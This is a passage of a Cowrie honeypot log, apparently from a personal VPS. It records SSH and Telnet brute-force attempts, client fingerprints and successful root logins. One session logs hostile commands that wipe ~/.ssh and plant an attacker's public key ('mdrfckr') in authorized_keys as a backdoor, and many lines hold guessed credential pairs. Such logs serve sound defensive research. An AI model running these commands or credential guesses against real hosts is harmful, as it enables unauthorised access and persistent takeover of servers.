{"eventid":"cowrie.session.closed","duration":59.40811586380005,"message":"Connection lost after 59 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:22:30.698861Z","src_ip":"218.1.218.143","session":"aeca61f393e5"}
{"eventid":"cowrie.session.closed","duration":64.01533341407776,"message":"Connection lost after 64 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:22:34.127866Z","src_ip":"218.1.218.143","session":"128818559c1f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58642,"dst_ip":"1.2.3.4","dst_port":23,"session":"ae6b25f332ef","protocol":"telnet","message":"New connection: 212.227.125.160:58642 (1.2.3.4:23) [session: ae6b25f332ef]","sensor":"my-vps","timestamp":"2025-08-28T01:23:04.480850Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:23:04.565364Z","src_ip":"212.227.125.160","session":"ae6b25f332ef"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T01:23:04.594148Z","src_ip":"212.227.125.160","session":"ae6b25f332ef"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":57954,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d5c27efee4c","protocol":"ssh","message":"New connection: 194.233.79.134:57954 (1.2.3.4:22) [session: 0d5c27efee4c]","sensor":"my-vps","timestamp":"2025-08-28T01:23:33.380306Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:23:33.953449Z","src_ip":"194.233.79.134","session":"0d5c27efee4c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:23:33.954087Z","src_ip":"194.233.79.134","session":"0d5c27efee4c"}
{"eventid":"cowrie.login.failed","username":"observer","password":"observer123","message":"login attempt [observer/observer123] failed","sensor":"my-vps","timestamp":"2025-08-28T01:23:35.812120Z","src_ip":"194.233.79.134","session":"0d5c27efee4c"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:23:37.033428Z","src_ip":"194.233.79.134","session":"0d5c27efee4c"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":58359,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ec5d79ecd8b","protocol":"ssh","message":"New connection: 80.94.95.112:58359 (1.2.3.4:22) [session: 4ec5d79ecd8b]","sensor":"my-vps","timestamp":"2025-08-28T01:24:28.256635Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T01:24:28.258347Z","src_ip":"80.94.95.112","session":"4ec5d79ecd8b"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T01:24:28.288369Z","src_ip":"80.94.95.112","session":"4ec5d79ecd8b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"craft","message":"login attempt [admin/craft] failed","sensor":"my-vps","timestamp":"2025-08-28T01:24:28.495302Z","src_ip":"80.94.95.112","session":"4ec5d79ecd8b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"corgan","message":"login attempt [admin/corgan] failed","sensor":"my-vps","timestamp":"2025-08-28T01:24:29.527523Z","src_ip":"80.94.95.112","session":"4ec5d79ecd8b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"cooker","message":"login attempt [admin/cooker] failed","sensor":"my-vps","timestamp":"2025-08-28T01:24:30.559916Z","src_ip":"80.94.95.112","session":"4ec5d79ecd8b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"computers","message":"login attempt [admin/computers] failed","sensor":"my-vps","timestamp":"2025-08-28T01:24:31.593416Z","src_ip":"80.94.95.112","session":"4ec5d79ecd8b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"citibank","message":"login attempt [admin/citibank] failed","sensor":"my-vps","timestamp":"2025-08-28T01:24:32.625862Z","src_ip":"80.94.95.112","session":"4ec5d79ecd8b"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:24:33.659003Z","src_ip":"80.94.95.112","session":"4ec5d79ecd8b"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":58624,"dst_ip":"1.2.3.4","dst_port":22,"session":"aed1f6a2b3b3","protocol":"ssh","message":"New connection: 194.233.79.134:58624 (1.2.3.4:22) [session: aed1f6a2b3b3]","sensor":"my-vps","timestamp":"2025-08-28T01:25:17.263613Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:25:17.306933Z","src_ip":"194.233.79.134","session":"aed1f6a2b3b3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:25:18.016889Z","src_ip":"194.233.79.134","session":"aed1f6a2b3b3"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123","message":"login attempt [hadoop/123] failed","sensor":"my-vps","timestamp":"2025-08-28T01:25:19.204229Z","src_ip":"194.233.79.134","session":"aed1f6a2b3b3"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:25:20.734952Z","src_ip":"194.233.79.134","session":"aed1f6a2b3b3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:26:04.625973Z","src_ip":"212.227.125.160","session":"ae6b25f332ef"}
{"eventid":"cowrie.session.closed","duration":180.1506679058075,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:26:04.631446Z","src_ip":"212.227.125.160","session":"ae6b25f332ef"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":65188,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8d4a951d7e8","protocol":"ssh","message":"New connection: 217.72.205.35:65188 (1.2.3.4:22) [session: a8d4a951d7e8]","sensor":"my-vps","timestamp":"2025-08-28T01:26:36.953838Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:26:36.954901Z","src_ip":"217.72.205.35","session":"a8d4a951d7e8"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":42082,"dst_ip":"1.2.3.4","dst_port":22,"session":"c44d7895b96c","protocol":"ssh","message":"New connection: 194.233.79.134:42082 (1.2.3.4:22) [session: c44d7895b96c]","sensor":"my-vps","timestamp":"2025-08-28T01:26:42.697818Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:26:42.748386Z","src_ip":"194.233.79.134","session":"c44d7895b96c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:26:45.067252Z","src_ip":"194.233.79.134","session":"c44d7895b96c"}
{"eventid":"cowrie.login.failed","username":"bot","password":"bot","message":"login attempt [bot/bot] failed","sensor":"my-vps","timestamp":"2025-08-28T01:26:45.976832Z","src_ip":"194.233.79.134","session":"c44d7895b96c"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:26:47.323349Z","src_ip":"194.233.79.134","session":"c44d7895b96c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48946,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae26611a1d50","protocol":"ssh","message":"New connection: 212.227.235.229:48946 (1.2.3.4:22) [session: ae26611a1d50]","sensor":"my-vps","timestamp":"2025-08-28T01:27:41.296286Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:27:41.297094Z","src_ip":"212.227.235.229","session":"ae26611a1d50"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T01:27:41.405355Z","src_ip":"212.227.235.229","session":"ae26611a1d50"}
{"eventid":"cowrie.login.failed","username":"airflow","password":"123456","message":"login attempt [airflow/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T01:27:41.730482Z","src_ip":"212.227.235.229","session":"ae26611a1d50"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:27:42.840358Z","src_ip":"212.227.235.229","session":"ae26611a1d50"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":35850,"dst_ip":"1.2.3.4","dst_port":22,"session":"42c90b027c78","protocol":"ssh","message":"New connection: 194.233.79.134:35850 (1.2.3.4:22) [session: 42c90b027c78]","sensor":"my-vps","timestamp":"2025-08-28T01:28:11.944898Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:28:12.002642Z","src_ip":"194.233.79.134","session":"42c90b027c78"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:28:12.288061Z","src_ip":"194.233.79.134","session":"42c90b027c78"}
{"eventid":"cowrie.login.failed","username":"debianuser","password":"1qazXSW@","message":"login attempt [debianuser/1qazXSW@] failed","sensor":"my-vps","timestamp":"2025-08-28T01:28:13.722848Z","src_ip":"194.233.79.134","session":"42c90b027c78"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:28:14.970353Z","src_ip":"194.233.79.134","session":"42c90b027c78"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57344,"dst_ip":"1.2.3.4","dst_port":22,"session":"2befddc94a7c","protocol":"ssh","message":"New connection: 212.227.235.229:57344 (1.2.3.4:22) [session: 2befddc94a7c]","sensor":"my-vps","timestamp":"2025-08-28T01:28:56.386503Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T01:28:56.387497Z","src_ip":"212.227.235.229","session":"2befddc94a7c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T01:28:56.696451Z","src_ip":"212.227.235.229","session":"2befddc94a7c"}
{"eventid":"cowrie.login.success","username":"root","password":"debian@123","message":"login attempt [root/debian@123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:28:57.974298Z","src_ip":"212.227.235.229","session":"2befddc94a7c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T01:28:58.644598Z","src_ip":"212.227.235.229","session":"2befddc94a7c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T01:28:58.645292Z","src_ip":"212.227.235.229","session":"2befddc94a7c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T01:28:58.646307Z","src_ip":"212.227.235.229","session":"2befddc94a7c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:28:58.956404Z","src_ip":"212.227.235.229","session":"2befddc94a7c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T01:28:59.655238Z","src_ip":"212.227.235.229","session":"2befddc94a7c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T01:28:59.656042Z","src_ip":"212.227.235.229","session":"2befddc94a7c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T01:28:59.968240Z","src_ip":"212.227.235.229","session":"2befddc94a7c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:28:59.969348Z","src_ip":"212.227.235.229","session":"2befddc94a7c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57352,"dst_ip":"1.2.3.4","dst_port":22,"session":"228040ccef06","protocol":"ssh","message":"New connection: 212.227.235.229:57352 (1.2.3.4:22) [session: 228040ccef06]","sensor":"my-vps","timestamp":"2025-08-28T01:29:00.262237Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T01:29:00.262960Z","src_ip":"212.227.235.229","session":"228040ccef06"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-